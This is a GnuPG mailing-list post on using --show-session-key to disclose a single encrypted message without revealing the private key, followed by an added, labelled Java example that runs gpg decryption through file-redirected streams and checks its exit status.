Generally those who use GPG never intend to provide a 3rd party access to an encrypted message. However, in the event you find yourself forced to disclose a message or face legal consequences, you have the option to disclose a specific message encrypted to you without providing your private key. The --show-session-key option will provide the static key used for encrypting that message without compromising any past or future content encrypted with that key.

--
Josh

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: OpenPGP digital signature
URL:
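
The stdin/stdout work-around from Peter Pentchev's reply in the "Problem in case decrypting large file size" thread above, written for a Java caller like the one the question describes. This is an added example, not code from the thread: the class and method names are hypothetical, and it assumes gpg is on the PATH and that the secret key can be unlocked without a terminal prompt (for example through gpg-agent).

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;

public class GpgStreamDecrypt {

    /**
     * Runs "gpg --batch --decrypt" with the child's standard streams bound
     * directly to files, and returns gpg's exit status (0 means success).
     */
    static int decrypt(Path encrypted, Path plaintext, Path errorLog)
            throws IOException, InterruptedException {
        // Decrypt into a temporary file next to the target so that a failed
        // run never leaves a truncated file under the final name.
        Path dir = plaintext.toAbsolutePath().getParent();
        Path partial = Files.createTempFile(dir, "gpg-", ".part");

        ProcessBuilder pb = new ProcessBuilder("gpg", "--batch", "--decrypt");
        pb.redirectInput(encrypted.toFile());   // child's file descriptor 0
        pb.redirectOutput(partial.toFile());    // child's file descriptor 1
        pb.redirectError(errorLog.toFile());    // child's file descriptor 2

        // Nothing flows through pipes owned by the JVM, so there is no
        // stream for this code to drain while gpg runs.
        int status = pb.start().waitFor();

        if (status == 0) {
            Files.move(partial, plaintext, StandardCopyOption.REPLACE_EXISTING);
        } else {
            Files.deleteIfExists(partial);      // discard incomplete output
        }
        return status;
    }

    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.err.println("usage: GpgStreamDecrypt <encrypted> <output>");
            System.exit(2);
        }
        Path log = Paths.get(args[1] + ".gpg-stderr.log");
        int status = decrypt(Paths.get(args[0]), Paths.get(args[1]), log);
        if (status != 0) {
            System.err.println("gpg exited with status " + status + ", see " + log);
        }
        System.exit(status);
    }
}
```

Checking the exit status before renaming the temporary file is what keeps a failed or interrupted decryption from being mistaken for a complete plaintext file.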